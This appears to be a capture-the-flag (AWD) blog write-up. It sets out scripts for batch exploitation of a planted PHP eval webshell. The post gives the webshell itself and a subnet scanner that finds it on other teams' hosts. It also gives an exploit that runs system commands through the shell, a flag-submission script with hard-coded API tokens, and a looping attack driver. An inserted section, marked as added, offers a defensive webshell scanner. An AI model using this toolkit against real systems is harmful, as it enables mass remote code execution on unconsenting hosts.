For AWD batch attacks I had mostly been looking at pwn; for web I had prepared a few scripts but never used them in practice. At the Shanghai city finals I debugged a script on site for batch-attacking a one-liner webshell, and wasted quite a bit of time there on it... It is adapted from my pwn script; I feel a web player's script would be more concise than mine. Make do with it.
Scanning IPs

The one-liner webshell sits at /assets/scripts/pass.php, with the following contents:

```php
<?php @eval($_POST['pass']);?>
```

When collecting hosts, the URL format needs to be changed to the path of the webshell file. init_hosts.py is as follows:
```python
import requests
import threading

# Coloured printers: orange for hits, red for misses
li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')


def check_ip(i):
    # Probe the webshell path on each team's host in the 10.103.x.1 range
    url = f'http://10.103.{i}.1/assets/scripts/pass.php'
    try:
        response = requests.get(url, timeout=0.5)
        if response.status_code == 200:
            li('[+] ' + url)
            # Reachable shells go to 'hosts', which attack.sh feeds to exp.py
            with open('hosts', 'a+') as f:
                f.write(url + '\n')
        else:
            raise Exception("Not 200 OK")
    except Exception as e:
        ll('[-] ' + url)
        # Unreachable or non-200 hosts are recorded separately in 'h'
        with open('h', 'a+') as f:
            f.write(url + '\n')


NUM_THREADS = 256
threads = []
for i in range(1, 256):
    thread = threading.Thread(target=check_ip, args=(i,))
    threads.append(thread)
    thread.start()
    # Throttle: once NUM_THREADS are running, wait for the batch to finish
    if len(threads) >= NUM_THREADS:
        for t in threads:
            t.join()
        threads = []
for t in threads:
    t.join()
```
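As an added, defender-side counterpart to the scan above (not part of the original post): in AWD every team has to find and remove the same pre-planted shell on its own box, so this script walks a webroot and flags PHP lines where an execution primitive is fed straight from a request superglobal, the shape of the pass.php one-liner. The sample webroot, its file list and the WEBSHELL_RE pattern are constructed here for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Code-execution primitive fed straight from a request superglobal, the shape of
# the planted shell <?php @eval($_POST['pass']);?> and its common variants.
WEBSHELL_RE = re.compile(
    r"@?\s*\b(eval|assert|system|passthru|shell_exec|exec|popen)\s*\("
    r"\s*.*?\$_(POST|GET|REQUEST|COOKIE)\s*\[",
    re.IGNORECASE,
)

def scan_file(path):
    """Return [(line_no, line)] for lines matching the webshell pattern."""
    hits = []
    text = Path(path).read_text(errors="replace")
    for n, line in enumerate(text.splitlines(), 1):
        if WEBSHELL_RE.search(line):
            hits.append((n, line.strip()))
    return hits

def scan_webroot(root, exts=(".php", ".phtml", ".php5", ".inc")):
    """Walk root; map 'relative/path.php' -> hits for every suspicious file."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                hits = scan_file(full)
                if hits:
                    rel = os.path.relpath(full, root).replace(os.sep, "/")
                    findings[rel] = hits
    return findings

def build_sample_webroot():
    """Constructed sample tree: the planted shell plus one clean PHP file."""
    root = tempfile.mkdtemp(prefix="awd_webroot_")
    os.makedirs(os.path.join(root, "assets", "scripts"))
    Path(root, "assets", "scripts", "pass.php").write_text(
        "<?php @eval($_POST['pass']);?>\n")
    Path(root, "index.php").write_text(
        "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>\n")
    return root

if __name__ == "__main__":
    for rel, hits in scan_webroot(build_sample_webroot()).items():
        for n, line in hits:
            print(f"[!] {rel}:{n}: {line}")
```

Run it against the real webroot instead of the sample tree, and diff the findings against a clean copy of the service before deleting anything the application legitimately needs.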
Attack script

The connection password in data needs to be changed; for this challenge it is pass. The exp.py code is as follows:
```python
import requests
import sys


def write_to_flags(d):
    # Append one flag per line to ./flags, which submit_flag.py reads later
    fd = open('./flags', 'ab')
    fd.write(d + b'\n')
    fd.close()


url = sys.argv[1]
print(url)
# The POST parameter name is the webshell's connection password ("pass" here)
data = {
    "pass": "system('cat /flag');"
}
response = requests.post(url=url, data=data)
if response.status_code == 200:
    flag = response.text.strip()
    print(flag)
    write_to_flags(flag.encode())
    print("Flag 已写入到 flags 文件中。")
else:
    print("获取 flag 失败:", response.status_code)
```
Batch flag submission script

Getting the url format right also took quite a while... I need to relearn Python, sigh. submit_flag.py is as follows:
```python
import threading
import os
import requests

flag_file = './flags'
threads = []


def submit(flag):
    try:
        # Submission formats from earlier platforms, kept for reference
        # url = 'https://ctf.bugku.com/awd/submit.html?token=88b02ce3b420ec1f4b4a2e02dd6fe305&flag=' + flag[:-1]
        #url = f"curl -X POST http://27.25.152.77:19999/api/flag -H 'Authorization: 7f120ca9b0e3024d06734a04a986cc55' -d '{{ \"flag\": \"{flag[:-1]}\"}}'"
        # Build the curl command for this event's API; flag[:-1] drops the trailing newline
        url = "curl -k -H \"Content-Type:application/json\" -X POST -d '{\"token\": \"0c9651851218f216253a2b0d84d24cfd\", \"flag\":\""
        url += flag[:-1]
        url += "\", \"pk\":\"be7e7b26c6a5235bcedc8531d6bfd648\"}\' \'https://10.10.26.231/api/awd/batch_flag/\'"
        print(url)
        # r = requests.get(url)
        os.system(url)
        print('\x1b[01;38;5;214m[+] pwned!\x1b[0m')
    except Exception as e:
        print('\x1b[01;38;5;214m[-] connect fail: {}\x1b[0m'.format(str(e)))


def main():
    # One submission thread per line in ./flags
    with open(flag_file) as flag_txt:
        flags = flag_txt.readlines()
    for flag in flags:
        thread = threading.Thread(target=submit, args=(flag,))
        threads.append(thread)
        thread.start()
    for thread in threads:
        thread.join()


if __name__ == "__main__":
    main()
```
Batch attack script

The batch attack script attack.sh is as follows:
```bash
#!/bin/bash
attack_times=10000          # number of rounds
round_wait_time=30          # seconds to wait between rounds
wait_submit_time=5          # seconds to wait before submitting
log_file="logs"
run_time=120                # timeout (s) for each exp.py run
next_attack_time=2.5        # delay (s) between launching attacks
max_concurrent_attacks=10   # max number of concurrent attacks

log(){
    t=$(date "+%H:%M:%S")
    m="[$t]$1"
    info="\033[43;37m $m \033[0m"
    echo -e "$info"
    echo -e "$m" >> "$log_file"
}

attack() {
    # Archive last round's flags under a round marker, then start fresh
    echo "-- round $1 -- " >> all_flags
    cat flags >> all_flags 2>/dev/null
    rm -f flags
    local jobs=0
    for line in $(cat hosts); do
        timeout --foreground $run_time python3 ./exp.py "$line" &
        sleep $next_attack_time
        ((jobs++))
        if [ "$jobs" -ge "$max_concurrent_attacks" ]; then
            wait # Wait for all background jobs to finish
            jobs=0
        fi
    done
    wait # Ensure all attacks are complete before moving on
    echo -e "\x1b[47;30m Waiting $wait_submit_time s to submit flag\x1b[0m"
    sleep $wait_submit_time
    echo -e "\x1b[47;30m Submitting flag\x1b[0m"
    python3 ./submit_flag.py
}

for ((i=1; i <= attack_times; i++)); do
    m="-------- round $i --------"
    log "$m"
    attack $i
    echo -e "\x1b[47;30m Waiting next round\x1b[0m"
    sleep $round_wait_time
done
```